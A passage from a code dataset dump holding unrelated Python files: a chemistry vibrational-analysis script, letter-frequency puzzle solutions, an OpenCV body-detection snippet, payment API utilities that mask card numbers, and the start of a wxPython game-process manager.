self.data.start_test_epoch(random_seed=current_random_seed, mode=self.mode)\n","sub_path":"src/callbacks/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":28963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"562988458","text":"import glob as glob\r\nimport os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport Analysis1D as Analysis1\r\nimport Analysis2D as Analysis2\r\nimport VAAcompplots as Comp\r\nfrom GaussianHandler import LogInterpreter\r\n\r\n\r\ndef run_1d_harmonic_analysis(elect_pot):\r\n \"\"\"runs script to complete HARMONIC analysis by NORMAL MODE of 1D scan data\r\n :arg elect_pot: dat file of electronic potential from relaxed scan\r\n :returns harm1d_0: PES of OH=0 for NM method\r\n :returns harm1d_1: PES of OH=1 for NM method\"\"\"\r\n freq_dir = os.path.join(main_dir, 'Roo Freqs')\r\n freq_list = sorted(glob.glob(os.path.join(freq_dir, 'chks', 'partrig_RooFreq_*.fchk')))\r\n numcoord = 39 # tetramer\r\n mass = (np.array(\r\n (15.999, 15.999, 1.008, 2.014, 2.014, 15.999, 2.014, 2.014, 15.999, 2.014, 2.014, 2.014, 2.014)\r\n )/0.00054858) # tetramer\r\n norm_modes = Analysis1.run_norm_mode(freq_list, numcoord, mass)\r\n np.savetxt(os.path.join(freq_dir, 'Roo_partrig_normalmodes.dat'), norm_modes)\r\n\r\n harm1d_0, harm1d_1 = Analysis1.plt_harm(norm_modes, elect_pot)\r\n plt.savefig(os.path.join(main_dir, 'figures', 'HbNM_1D_partrig_ohcurves.png'))\r\n np.savetxt(os.path.join(main_dir, 'VAA', 'HbNM_1D_partrig_OH=0.dat'), harm1d_0)\r\n np.savetxt(os.path.join(main_dir, 'VAA', 'HbNM_1D_partrig_OH=1.dat'), harm1d_1)\r\n return harm1d_0, harm1d_1\r\n\r\n\r\ndef run_2d_harmonic_analysis(mini_pot):\r\n \"\"\"runs script to complete HARMONIC analysis by FINITE DIFFERENCE of 2D scan data.\r\n :arg mini_pot: dat file of electronic potential from 2D relaxed scan\r\n :returns harm2d_0: PES of OH=0 for FD method\r\n :returns harm2d_1: PES of OH=1 for FD method\"\"\"\r\n FD_dir = os.path.join(main_dir, 'VAA', 'harmonic data', 'finite data')\r\n FD_scans = sorted(glob.glob(os.path.join(FD_dir, 'Egraph_partrig*.dat')))\r\n freqs = Analysis2.do_ALL_the_freqy_science(FD_scans)\r\n np.savetxt(os.path.join(main_dir, 'VAA', 'HbFD_2D_partrig_freqs.dat'), freqs)\r\n\r\n harm2d_0, harm2d_1 = Analysis2.make_the_plot(freqs, mini_pot)\r\n np.savetxt(os.path.join(main_dir, 'VAA', 'HbFD_2D_partrig_OH=0.dat'), harm2d_0)\r\n np.savetxt(os.path.join(main_dir, 'VAA', 'HbFD_2D_partrig_OH=1.dat'), harm2d_1)\r\n plt.savefig(os.path.join(main_dir, 'figures', 'HbFD_2D_partrig_ohcurves.png'))\r\n plt.close()\r\n return harm2d_0, harm2d_1\r\n\r\n\r\ndef run_2d_anharmonic_analysis(cut_dict, mini_pot):\r\n \"\"\"runs script to complete ANHARMONIC analysis by DISCRETE VARIABLE REPRESENTATION of 2D scan data.\r\n :arg mini_pot: dat file of electronic potential from 2D relaxed scan\r\n :returns anharm_0: PES of OH=0 for DVR method\r\n :returns anharm_1: PES of OH=1 for DVR method\"\"\"\r\n energy_array, wfn_array = Analysis2.run_dvr(cut_dict, 4, plots=True, save=True)\r\n\r\n anharm_0, anharm_1 = Analysis2.make_the_other_plot(energy_array, mini_pot)\r\n np.savetxt(os.path.join(main_dir, 'VAA', 'AbDVR_2D_partrig_OH=0.dat'), anharm_0)\r\n np.savetxt(os.path.join(main_dir, 'VAA', 'AbDVR_2D_partrig_OH=1.dat'), anharm_1)\r\n plt.savefig(os.path.join(main_dir, 'figures', 'AbDVR_2D_partrig_ohcurves.png'))\r\n plt.close()\r\n return anharm_0, anharm_1\r\n\r\n\r\ndef run_comp_plots(mini_pot, harm1d_0, harm1d_1, harm2d_0, harm2d_1, anharm_0, anharm_1):\r\n \"\"\"runs script to compare VAA results using above methods.\r\n :arg mini_pot: Minimum energy through 2D plot (x=Roo (ang) y=Energy (hartrees))\r\n :arg harm1d_0: PES of OH=0 for NM method\r\n :arg harm1d_1: PES of OH=1 for NM method\r\n :arg harm2d_0: PES of OH=0 for FD method\r\n :arg harm2d_1: PES of OH=1 for FD method\r\n :arg anharm_0: PES of OH=0 for DVR method\r\n :arg anharm_1: PES of OH=1 for DVR method\"\"\"\r\n Comp.plot_comparison_2d(harm2d_0, harm2d_1, anharm_0, anharm_1, mini_pot)\r\n plt.savefig(os.path.join(main_dir, 'figures', '2D_partrig_VAA_energycurves.png'))\r\n plt.close()\r\n\r\n Comp.plot_diffs(harm1d_0, harm1d_1, anharm_0, anharm_1, harm2d_0, harm2d_1)\r\n plt.savefig(os.path.join(main_dir, 'figures', 'E0E1_partrig_differenceplot.png'))\r\n plt.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n main_dir = os.path.dirname(os.path.dirname(__file__))\r\n elect_pot = np.loadtxt(os.path.join(main_dir, '1D Scans', '1D_partrig_electpot.dat'))\r\n harm1d_0, harm1d_1 = run_1d_harmonic_analysis(elect_pot)\r\n\r\n scan_dir = os.path.join(main_dir, '2D Scans')\r\n all_scans = list(sorted(glob.glob(os.path.join(scan_dir, \"2Dtet_partrig*.log\"))))\r\n cut_dict = LogInterpreter(*all_scans).cut_dictionary(midpoint=True)\r\n mini_pot = LogInterpreter(*all_scans).minimum_pot()\r\n harm2d_0, harm2d_1 = run_2d_harmonic_analysis(mini_pot)\r\n anharm_0, anharm_1 = run_2d_anharmonic_analysis(mini_pot)\r\n run_comp_plots(mini_pot, harm1d_0, harm1d_1, harm2d_0, harm2d_1, anharm_0, anharm_1)\r\n\r\n","sub_path":"dovaathings.py","file_name":"dovaathings.py","file_ext":"py","file_size_in_byte":4857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"376189916","text":"\"\"\"\nInput: A text for analysis as a string.\nOutput: The most frequent letter in lower case as a string.\n\"\"\"\n\ndef checkio(text):\n # raw string process, transfer to lower case and remove spaces\n text = text.lower().replace(\" \", \"\")\n\n # raw string process 2, create a list, sort and add an empty string at the end.\n text_list = [i for i in text if ord(i) in range(97, 123)]\n text_list = sorted(text_list)\n text_list.append(\"\")\n\n # create an empty dict and a loop to add data to the dict\n text_dict = {}\n index = len(text_list)\n occurrence = 1\n for i in range(0, index - 1):\n if text_list[i] == text_list[i + 1]:\n occurrence += 1\n else:\n text_dict[text_list[i]] = occurrence\n occurrence = 1\n\n # generate a list that stores all the values\n occurrence_max = max(list(text_dict.values()))\n for keys in text_dict.keys():\n if text_dict[keys] == occurrence_max:\n break\n return keys\n\n# another method\nimport string\n\ndef checkio(text):\n \"\"\"\n We iterate through latyn alphabet and count each letter in the text.\n Then \"max\" selects the most frequent letter.\n For the case when we have several equal letter,\n \"max\" selects the first from them.\n \"\"\"\n text = text.lower()\n return max(string.ascii_lowercase, key=text.count)\n\ndef checkio(text):\n import string\n text = \"\".join(sorted(list(filter(lambda x: x in string.ascii_lowercase, text.lower()))))\n for i in text:\n if text.count(i) == max(map(text.count, string.ascii_lowercase)):\n return i\n\nif __name__ == \"__main__\":\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert checkio(\"Hello World!\") == \"l\", \"Hello test\"\n assert checkio(\"How do you do?\") == \"o\", \"O is most wanted\"\n assert checkio(\"One\") == \"e\", \"All letter only once.\"\n assert checkio(\"Oops!\") == \"o\", \"Don't forget about lower case.\"\n assert checkio(\"AAaooo!!!!\") == \"a\", \"Only letters.\"\n assert checkio(\"abe\") == \"a\", \"The First.\"\n assert checkio(\"a\" * 9000 + \"b\" * 1000) == \"a\", \"Long.\"\n print(\"The local tests are done.\")\n","sub_path":"AlgorithmTraining/Checkio/home/p1_the_most_wanted_letter.py","file_name":"p1_the_most_wanted_letter.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"20303420","text":"from matplotlib import pyplot as plt\nimport skimage.io as imageio\nimport pandas as pd\nimport numpy as np\nimport cv2\n\nfullbody = cv2.CascadeClassifier(\"/home/lenovo/Documents/haarcascades/haarcascade_fullbody.xml\")\n\nimage = cv2.imread(\"i.jpeg\")\n\ngray=cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\nimageio.imshow(gray)\n\nforehead=fullbody.detectMultiScale(gray, 1.2, 3)\nprint(forehead)\n\ngozler=[]\nfor (x,y,w,h) in forehead:\n gozler.append(gray[y:y+h, x:x+w])\nimageio.imshow(gozler[0])\n# imageio.imshow(gozler[1])\n\nfor gz in gozler:\n plt.imshow(gz)\n plt.show() \n pd.DataFrame({'fullbody':str(gozler[0]), 'forehead':str(gozler[1])},index=[0,1]).to_csv('fullbodydata.csv')","sub_path":"Feature_Extration-Harcascasde/fullbody.py","file_name":"fullbody.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"433921424","text":"import hashlib\nimport copy\n\nfrom django.conf import settings\n\nfrom carddirector.cd_api import fis\nfrom carddirector.cd_api.constants import tps_response_codes, result_keys, message_types, response_codes\nfrom carddirector.cd_api.constants.response_codes import INFO_REQUEST_IS_BEING_PROCESSED, ERROR_ISSUING, INFO_TPS, ERROR_INSUFFICIENT_BALANCE, ERROR_TPS, INFO_REF, INFO_OPERATION_COMPLETED, INFO_CARD_BALANCE_SUCCESS, INFO_CARD_LOAD_SUCCESS, INFO_CARD_UNLOAD_SUCCESS\nfrom carddirector.cd_api.constants.result_keys import RESULT_CURRENCY, RESULT_CARD_ACCOUNT_BALANCE\nfrom carddirector.cd_api.constants.status_codes import STATUS_SUCCESS, STATUS_FAIL, STATUS_PROCESSING\nfrom carddirector.cd_utils import string_utils\nfrom carddirector.cd_utils.date_utils import get_now\nfrom carddirector.cd_utils.string_utils import format_in_cents\nfrom carddirector.tps_account.repos import find_card_holder_by_card_id\nfrom carddirector.tps_txn.repos import find_cd_transaction_by_acq_txn_no\nfrom carddirector.cd_api.messages.CardDirectorRequest_pb2 import CardDirectorRequest\n\n\ndef get_message_from_response(tps_response, response_code, default_value=\"\"):\n for response_entry in tps_response.responseEntries:\n if response_entry.responseCode == response_code:\n return response_entry.responseMessage\n return default_value\n\n\ndef add_response(tps_response, code, message):\n response_entry = tps_response.responseEntries.add()\n response_entry.responseCode = code\n response_entry.responseMessage = message\n\n\ndef fill_cd_response_header_fields(protobuf_response):\n header = protobuf_response.header\n header.messageId = generate_message_id()\n header.signatureAlgorithm = \"SHA256\"\n header.timestamp = get_current_timestamp()\n\n\ndef generate_message_id():\n return string_utils.random_string(16)\n\n\ndef get_current_timestamp():\n from carddirector.cd_utils import date_utils\n\n return date_utils.get_utcnow_with_isoformat()\n\n\ndef _add_response(protobuf_response, code, message=\"N/A\"):\n response_add = protobuf_response.responses.add()\n response_add.responseCode = code\n response_add.responseMessage = message\n\n\ndef _update_response_status_code(protobuf_response, tps_response):\n if tps_response.success:\n _set_status_code_success(protobuf_response)\n else:\n from carddirector.tps_protobuf import utils\n\n is_mq_timeout_response = utils.is_mq_timeout_tps_response(tps_response)\n if is_mq_timeout_response:\n _set_status_code_processing(protobuf_response)\n else:\n _set_status_code_fail(protobuf_response)\n\n\ndef translate_tps_response(message_type, cd_response, tps_response):\n from carddirector.tps_protobuf import utils\n\n is_mq_timeout_response = utils.is_mq_timeout_tps_response(tps_response)\n if is_mq_timeout_response:\n _add_response(cd_response, INFO_REQUEST_IS_BEING_PROCESSED, \"Request is being processed. Please wait for callback or do Response Result Enquiry after a while.\")\n else:\n for tps_response_entry in tps_response.responseEntries:\n if tps_response_entry.responseCode == tps_response_codes.ERROR_FIS:\n _add_response(cd_response, ERROR_ISSUING,\n \"%s - %s\" % (\"Issuing System Error\", tps_response_entry.responseMessage))\n elif tps_response_entry.responseCode == tps_response_codes.INFO_FIS_ACTION_CODE:\n fis_action_code = tps_response_entry.responseMessage\n fis_message = fis.FIS_ACTION_CODES[fis_action_code]\n _add_response(cd_response, INFO_TPS,\n \"%s - %s: %s\" % (\"Issuing System Response\", fis_action_code, fis_message))\n elif tps_response_entry.responseCode == tps_response_codes.ERROR_INSUFFICIENT_BALANCE:\n _add_response(cd_response, ERROR_INSUFFICIENT_BALANCE,\n \"%s - %s\" % (tps_response_entry.responseCode, tps_response_entry.responseMessage))\n elif tps_response_entry.responseCode.startswith(tps_response_codes.ERROR_PREFIX):\n _add_response(cd_response, ERROR_TPS,\n \"%s - %s\" % (tps_response_entry.responseCode, tps_response_entry.responseMessage))\n elif tps_response_entry.responseCode.startswith(tps_response_codes.INFO_CD_CARD_ID):\n continue\n elif tps_response_entry.responseCode.startswith(tps_response_codes.INFO_CD_CUSTOMER_CARD_ID):\n continue\n elif tps_response_entry.responseCode.startswith(tps_response_codes.INFO_PREFIX):\n _add_response(cd_response, INFO_TPS,\n \"%s - %s\" % (tps_response_entry.responseCode, tps_response_entry.responseMessage))\n else:\n _add_response(cd_response, INFO_REF,\n \"%s - %s\" % (tps_response_entry.responseCode, tps_response_entry.responseMessage))\n\n _update_response_status_code(cd_response, tps_response)\n\n if message_types.CARD_ACCOUNT_BALANCE == message_type:\n translate_card_account_balance_response(cd_response, tps_response)\n elif message_types.CARD_LOAD == message_type:\n translate_card_load_response(cd_response, tps_response)\n elif message_types.CARD_UNLOAD == message_type:\n translate_card_unload_response(cd_response, tps_response)\n elif message_types.CARD_STATUS_ENQUIRY == message_type:\n translate_card_status_enquiry_response(cd_response, tps_response)\n elif message_types.ACQUIRING_PURCHASE == message_type:\n translate_acquiring_purchase_response(cd_response,tps_response)\n elif message_types.ACQUIRING_REFUND == message_type:\n translate_acquiring_refund_response(cd_response,tps_response)\n return cd_response\n\n\ndef translate_card_account_balance_response(protobuf_response, tps_response):\n _update_card_id_mapping_to_response(protobuf_response, tps_response)\n\n currency_list = [response_entry.responseMessage for response_entry in tps_response.responseEntries if\n response_entry.responseCode == tps_response_codes.INFO_CD_CARD_CURR_CODE]\n balance_list = [response_entry.responseMessage for response_entry in tps_response.responseEntries if\n response_entry.responseCode == tps_response_codes.INFO_CD_CARD_AVL_BALANCE]\n if len(currency_list) > 0: _add_result(protobuf_response, RESULT_CURRENCY, currency_list[0])\n if len(balance_list) > 0: _add_result(protobuf_response, RESULT_CARD_ACCOUNT_BALANCE,\n format_in_cents(balance_list[0]))\n if tps_response.success:\n _add_response(protobuf_response, INFO_OPERATION_COMPLETED)\n _add_response(protobuf_response, INFO_CARD_BALANCE_SUCCESS)\n\n\ndef translate_card_load_response(protobuf_response, tps_response):\n if tps_response.success:\n _add_response(protobuf_response, INFO_OPERATION_COMPLETED)\n _add_response(protobuf_response, INFO_CARD_LOAD_SUCCESS)\n\n\ndef translate_card_unload_response(protobuf_response, tps_response):\n if tps_response.success:\n _add_response(protobuf_response, INFO_OPERATION_COMPLETED)\n _add_response(protobuf_response, INFO_CARD_UNLOAD_SUCCESS)\n\n\ndef translate_card_status_enquiry_response(protobuf_response, tps_response):\n\n _update_card_id_mapping_to_response(protobuf_response, tps_response)\n\n card_status_code = get_message_from_response(tps_response, tps_response_codes.INFO_CD_CARD_STATUS_CODE, \"\")\n card_expiry_date = get_message_from_response(tps_response, tps_response_codes.INFO_CD_CARD_EXPIRY_DATE, \"\")\n card_curr_code = get_message_from_response(tps_response, tps_response_codes.INFO_CD_CARD_CURR_CODE, \"\")\n card_masked_pan = get_message_from_response(tps_response, tps_response_codes.INFO_CD_CARD_MASKED_PAN, \"\")\n _add_result(protobuf_response, result_keys.RESULT_CARD_STATUS_CODE, card_status_code)\n _add_result(protobuf_response, result_keys.RESULT_CARD_EXPIRY_DATE, card_expiry_date)\n _add_result(protobuf_response, result_keys.RESULT_CARD_CURR_CODE, card_curr_code)\n _add_result(protobuf_response, result_keys.RESULT_CARD_MASKED_PAN, card_masked_pan)\n if tps_response.success:\n _add_response(protobuf_response, INFO_OPERATION_COMPLETED)\n _add_response(protobuf_response, INFO_CARD_BALANCE_SUCCESS)\n\ndef translate_acquiring_purchase_response(protobuf_response, tps_response):\n if tps_response.success:\n acq_transaction_number = get_message_from_response(tps_response, tps_response_codes.INFO_CD_ACQ_TRANSACTION_NUMBER, \"\")\n _update_acquiring_transaction_result(protobuf_response, acq_transaction_number)\n\n _add_response(protobuf_response, INFO_OPERATION_COMPLETED)\n _add_response(protobuf_response, response_codes.INFO_ACQUIRING_PURCHASE_SUCCESS)\n\ndef translate_acquiring_refund_response(protobuf_response, tps_response):\n if tps_response.success:\n acq_transaction_number = get_message_from_response(tps_response, tps_response_codes.INFO_CD_ACQ_TRANSACTION_NUMBER, \"\")\n _update_acquiring_transaction_result(protobuf_response, acq_transaction_number)\n\n _add_response(protobuf_response, INFO_OPERATION_COMPLETED)\n _add_response(protobuf_response, response_codes.INFO_ACQUIRING_REFUND_SUCCESS)\n\ndef _update_acquiring_transaction_result(protobuf_response, acq_transaction_number):\n _add_result(protobuf_response, result_keys.RESULT_ACQ_TRANSACTION_NO, acq_transaction_number)\n\n cd_transaction = find_cd_transaction_by_acq_txn_no(acq_transaction_number)\n if cd_transaction:\n card_id = cd_transaction.cd_card_id\n card_holder = find_card_holder_by_card_id(card_id)\n masked_pan = string_utils.get_last_characters(card_holder.pan,4)\n\n _add_result(protobuf_response, result_keys.RESULT_ACQ_ORDER_INFO, cd_transaction.acq_order_info)\n _add_result(protobuf_response, result_keys.RESULT_ACQ_MERCH_TXN_REF, cd_transaction.acq_merchant_txn_ref)\n _add_result(protobuf_response, result_keys.RESULT_ACQ_MERCHANT_ID, cd_transaction.acq_merchant_id)\n _add_result(protobuf_response, result_keys.RESULT_ACQ_AMOUNT_IN_CENTS, string_utils.format_in_cents(cd_transaction.tps_transaction.amount))\n _add_result(protobuf_response, result_keys.RESULT_ACQ_CURRENCY, cd_transaction.tps_transaction.tps_currency.name)\n _add_result(protobuf_response, result_keys.RESULT_CARD_MASKED_PAN, masked_pan)\n\n if cd_transaction.acq_purchase_txn_number:\n _add_result(protobuf_response, result_keys.RESULT_ACQ_PURCHASE_TRANSACTION_NO, cd_transaction.acq_purchase_txn_number)\n\ndef _update_card_id_mapping_to_response(protobuf_response, tps_response):\n customer_card_id = get_message_from_response(tps_response, tps_response_codes.INFO_CD_CUSTOMER_CARD_ID, \"\")\n card_id = get_message_from_response(tps_response, tps_response_codes.INFO_CD_CARD_ID, \"\")\n\n required_return_card_id = (customer_card_id!='' or card_id!='')\n mapped_card_id = card_id\n if customer_card_id!=u'':\n mapped_card_id = customer_card_id\n\n if required_return_card_id:\n _add_response(protobuf_response, INFO_REF,\n \"%s - %s\" % (tps_response_codes.INFO_CD_CARD_ID, mapped_card_id))\n\n\ndef generate_token(client_code):\n salt = string_utils.random_string()\n time = get_now().isoformat()\n message = client_code + '\\0' + time + '\\0' + salt\n hashAlgorithm = hashlib.new('sha256')\n hashAlgorithm.update(message)\n return hashAlgorithm.hexdigest()\n\ndef _add_result(protobuf_response, key, value):\n result_add = protobuf_response.results.add()\n result_add.resultKey = key\n result_add.resultValue = value\n\n\ndef _set_status_code_success(protobuf_response):\n protobuf_response.statusCode = STATUS_SUCCESS\n\n\ndef _set_status_code_fail(protobuf_response):\n protobuf_response.statusCode = STATUS_FAIL\n\n\ndef _set_status_code_processing(protobuf_response):\n protobuf_response.statusCode = STATUS_PROCESSING\n\n\ndef _update_protobuf_response_header(protobuf_response):\n fill_cd_response_header_fields(protobuf_response)\n\n\ndef _update_protobuf_response_request_header(protobuf_response, protobuf_request=None):\n if protobuf_request:\n request_header = protobuf_response.requestHeader\n request_header.version = protobuf_request.header.version\n request_header.messageId = protobuf_request.header.messageId\n request_header.clientId = protobuf_request.header.clientId\n request_header.timestamp = protobuf_request.header.timestamp\n request_header.messageType = protobuf_request.header.messageType\n return protobuf_response\n\ndef is_image_file_ext(filename):\n file_ext = string_utils.get_file_ext(filename)\n if file_ext.lower() in settings.KYC_FILE_UPLOAD_IMAGE_ALLOWED_EXT:\n return True\n return False\n\ndef mask_pan(pan):\n return '%s%s' % (('*' * (len(pan) - 4)) , pan[-4:])\n\ndef mask_cvv(cvv):\n return '*' * len(cvv)\n\ndef mask_json_request_sensitive_info(json_request_dict):\n masked_json_request_dict = copy.deepcopy(json_request_dict)\n if 'acquiringPurchaseInfo' in masked_json_request_dict:\n purchase_info = masked_json_request_dict['acquiringPurchaseInfo']\n if 'pan' in purchase_info:\n purchase_info['pan'] = mask_pan(purchase_info['pan'])\n if 'cvv' in purchase_info:\n purchase_info['cvv'] = mask_cvv(purchase_info['cvv'])\n return masked_json_request_dict\n\ndef mask_protobuf_request_sensitive_info(protobuf_request):\n masked_protobuf_request = CardDirectorRequest()\n masked_protobuf_request.CopyFrom(protobuf_request)\n acq_purchase_info = masked_protobuf_request.acquiringPurchaseInfo\n if acq_purchase_info.HasField('pan'):\n acq_purchase_info.pan = mask_pan(acq_purchase_info.pan)\n if acq_purchase_info.HasField('cvv'):\n acq_purchase_info.cvv = mask_cvv(acq_purchase_info.cvv)\n return masked_protobuf_request\n\nclass Namespace: pass\n","sub_path":"apps/carddirector/cd_api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"81845967","text":"# !/usr/bin/env python\n# encoding: utf-8\n\n'''\n@author: senlian\n@license: (C) Copyright 2013-2017, Node Supply Chain Manager Corporation Limited.\n@file: ProcessManager.py\n@time: 2018/8/13 9:03\n@module:python -m pip install wxpython\n@desc:To start Game processes and Record the pid.\n'''\nimport wx, wx.adv, wx.grid, wx.ribbon\nimport wx.stc as STC\nimport wx.lib.agw.customtreectrl as CT\nimport os, sys, glob, re, time, gc, psutil\nimport json, csv, shutil\nimport threading, multiprocessing\nimport win32file\n# import signal\nimport chardet\n# from Queue import Queue\nfrom psutil import Process\nfrom common.B64data import *\nfrom common import frozen\nfrom common.SenLian_Process import *\nfrom common.Senlian_Win32 import Window\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\nscriptPath = os.path.normpath(os.path.abspath(__file__))\nscriptDir = os.path.dirname(scriptPath)\n\nSystemWindow = Window()\n\nID_OpenDir = wx.NewId()\nID_RootFrame = wx.NewId()\nID_MenuBar = wx.NewId()\nID_ToolBar = wx.NewId()\nID_MidWindow = wx.NewId()\nID_StatusBar = wx.NewId()\nID_Switch = wx.NewId()\nID_Start = wx.NewId()\nID_Pause = wx.NewId()\nID_Close = wx.NewId()\nID_MONGO = wx.NewId()\nID_REDIS = wx.NewId()\nID_PREPARE = wx.NewId()\nID_AFTER = wx.NewId()\n\nTIME_SLEEP = 1\n\nPRE_PY_SCRIPT = os.path.abspath(\"./prepare.py\")\nREDIS_PY_SCRIPT = os.path.abspath(\"./redis_backup.py\")\nMONGO_PY_SCRIPT = os.path.abspath(\"./mongo_backup.py\")\nAFTER_PY_SCRIPT = os.path.abspath(\"./after.py\")\nLOG_FILE_PATH = os.path.abspath(\"./ProcessManager.log\")\n\nwildcard = u\"py files (*.py)|*.py|\" \\\n \"bat files (*.bat)|*.bat|\" \\\n \"All files (*.*)|*.*\"\n\n\ndef wait_time(seconds):\n time.sleep(int(seconds))\n\n\ndef get_code(item):\n return chardet.detect(item).get(\"encoding\", \"utf-8\")\n\n\ndef explorer_select_file(filepath):\n if os.path.isfile(filepath):\n os.popen('explorer.exe /select, \"{0}\"'.format(filepath))\n elif os.path.isdir(filepath):\n os.startfile(filepath, \"explore\")\n # os.popen('explorer.exe /n, \"{0}\"'.format(filepath))\n else:\n return\n\n # TODO: 主框架\n\n\ndef OpenDirDialog(defaultDir='', parent=None):\n if not parent:\n return False\n\n dlg = wx.DirDialog(parent, message=u\"打开路径\",\n defaultPath=defaultDir,\n style=wx.DD_DEFAULT_STYLE)\n targetDir = defaultDir\n if dlg.ShowModal() == wx.ID_OK:\n targetDir = dlg.GetPath()\n dlg.Destroy()\n return targetDir\n\n\ndef OpenFileDialog(defaultDir='', defaultFile='', parent=None):\n if not defaultDir:\n defaultDir = defaultFile\n if not parent:\n return False\n\n dlg = wx.FileDialog(parent, message=u\"另存为\",\n defaultDir=defaultDir,\n defaultFile=defaultFile,\n wildcard=wildcard,\n style=wx.FD_OPEN)\n targetFile = defaultFile\n if dlg.ShowModal() == wx.ID_OK:\n targetFile = dlg.GetPath()\n dlg.Destroy()\n return targetFile\n\n\nclass RootFrame(wx.Frame):\n def __init__(self, parent=None):\n super(RootFrame, self).__init__(parent=parent, id=ID_RootFrame)\n self.settings()\n wx.CallAfter(self.initUI)\n\n def settings(self):\n self.SetTitle(u'游戏进程管理器')\n self.SetSize((1080, 720))\n self.TaskBarIcon = None\n icon = PyEmbeddedImage(B64_POKER128).GetIcon()\n self.SetWindowStyle(wx.DEFAULT_FRAME_STYLE)\n self.SetIcon(icon)\n self.Center()\n self.JsonObj = json.loads(open('./startApp.json', 'r').read().replace('\\\\', '/'))\n\n def initUI(self):\n MenuBar(self)\n ToolBar(self)\n StatusBar(self)\n wx.CallAfter(MidWindow, self)\n self.GetMenuBar().Bind(wx.EVT_MENU, self.OnExit, id=wx.ID_EXIT)\n self.Bind(wx.EVT_CLOSE, self.OnExit, self)\n self.Bind(wx.EVT_ICONIZE, self.OnIconfiy)\n\n def infoBox(self, msg=\"页面加载中...\"):\n infoDialog = wx.MessageDialog(parent=self, message=msg, caption=\"提示\", style=wx.ICON_INFORMATION)\n return infoDialog.ShowModal()\n\n def warnBox(self, msg=\"确认要继续操作吗?\"):\n warnDialog = wx.MessageDialog(parent=self, message=msg, caption=\"警告\",\n style=wx.OK | wx.CANCEL | wx.ICON_EXCLAMATION)\n return warnDialog.ShowModal()\n\n def errorBox(self, msg=\"操作失败,请排查原因!\"):\n errorDialog = wx.MessageDialog(parent=self, message=msg, caption=\"错误\",\n style=wx.OK | wx.CANCEL | wx.ICON_ERROR)\n return errorDialog.ShowModal()\n\n def OnIconfiy(self, e):\n if not self.IsIconized():\n if not self.IsShown():\n self.Show()\n self.Raise()\n else:\n if self.IsShown():\n self.Hide()\n self.TaskBarIcon = TaskBarIcon(self)\n return e.Skip()\n\n def OnExit(self, e):\n self.SetStatusText('正在退出...', 1)\n try:\n self.SetStatusText('线程退出...', 2)\n self.FindWindowById(ID_MidWindow, self).PageOne.RightPanel.ReSetJob()\n self.SetStatusText('数据保存...', 2)\n self.FindWindowById(ID_MidWindow, self).PageOne.RightPanel.SaveToCsv()\n self.SetStatusText('日志保存...', 2)\n self.FindWindowById(ID_MidWindow, self).PageTwo.SaveToFile(e)\n except Exception as e:\n print(e)\n self.Destroy()\n if e:\n e.Skip()\n return gc.collect()\n\n\n# TODO: 菜单栏\nclass MenuBar(wx.MenuBar):\n def __init__(self, parent=None, id=ID_MenuBar):\n super(MenuBar, self).__init__()\n if parent:\n self.parent = parent\n self.setItems()\n self.parent.SetMenuBar(self)\n\n def setItems(self):\n FileMenu = wx.Menu()\n OptionMenu = wx.Menu()\n ViewMenu = wx.Menu()\n HelpMenu = wx.Menu()\n\n FileMenu.Append(ID_OpenDir, u\"打开目录(&O)\\tCtrl+O\", u\"打开目录\")\n FileMenu.Append(wx.ID_FILE, u\"设置(&S)...\\tCtrl+S\", u\"设置\")\n FileMenu.AppendSeparator()\n FileMenu.Append(wx.ID_EXIT, u\"退出(&Q)...\\tCtrl+Q\", u\"退出\")\n\n OptionMenu.Append(ID_PREPARE, u\"环境准备\", u\"执行环境准备脚本\", kind=wx.ITEM_CHECK).Check()\n OptionMenu.Append(ID_REDIS, u\"备份Redis\", u\"执行Redis备份脚本\", kind=wx.ITEM_CHECK).Check()\n OptionMenu.Append(ID_MONGO, u\"备份Mongo\", u\"执行Mongo备份脚本\", kind=wx.ITEM_CHECK).Check()\n OptionMenu.Append(ID_AFTER, u\"环境恢复\", u\"执行环境恢复脚本\", kind=wx.ITEM_CHECK).Check()\n\n self.Tools = ViewMenu.Append(ID_ToolBar, u'工具栏(&T)', u'工具栏', kind=wx.ITEM_CHECK)\n self.Tools.Check(True)\n self.Status = ViewMenu.Append(ID_StatusBar, u'状态栏(&S)', u'状态栏', kind=wx.ITEM_CHECK)\n self.Status.Check(True)\n\n HelpMenu.Append(wx.ID_HELP, u\"说明(&H)\", u\"工具帮助信息\")\n HelpMenu.Append(wx.ID_ABOUT, u\"关于(&A)\", u\"作者@senlian\")\n\n self.Append(FileMenu, u'文件(&F)')\n self.Append(OptionMenu, u'选项(&O)')\n self.Append(ViewMenu, u'查看(&H)')\n self.Append(HelpMenu, u'帮助(&H)')\n FileMenu.Bind(wx.EVT_MENU, self.OpenWorkDir, id=ID_OpenDir)\n FileMenu.Bind(wx.EVT_MENU, self.FileMenuEvt, id=wx.ID_FILE)\n ViewMenu.Bind(wx.EVT_MENU, self.ToggleToolBar, id=ID_ToolBar)\n ViewMenu.Bind(wx.EVT_MENU, self.ToggleStatusBar, id=ID_StatusBar)\n\n def OpenWorkDir(self, e):\n toolpath = os.path.splitext(scriptPath)[0] + '.exe'\n explorer_select_file(toolpath)\n e.Skip()\n\n def FileMenuEvt(self, e):\n setDialog = SetBasicDialog(self.parent, u'设置面板')\n if setDialog.ShowModal() == wx.ID_OK:\n setDialog.SetGlobal()\n e.Skip()\n\n def ToggleToolBar(self, e):\n ToolBar = self.parent.GetToolBar()\n if self.Tools.IsChecked():\n ToolBar.Show()\n else:\n ToolBar.Hide()\n ToolBar.Realize()\n if e:\n e.Skip()\n\n def ToggleStatusBar(self, 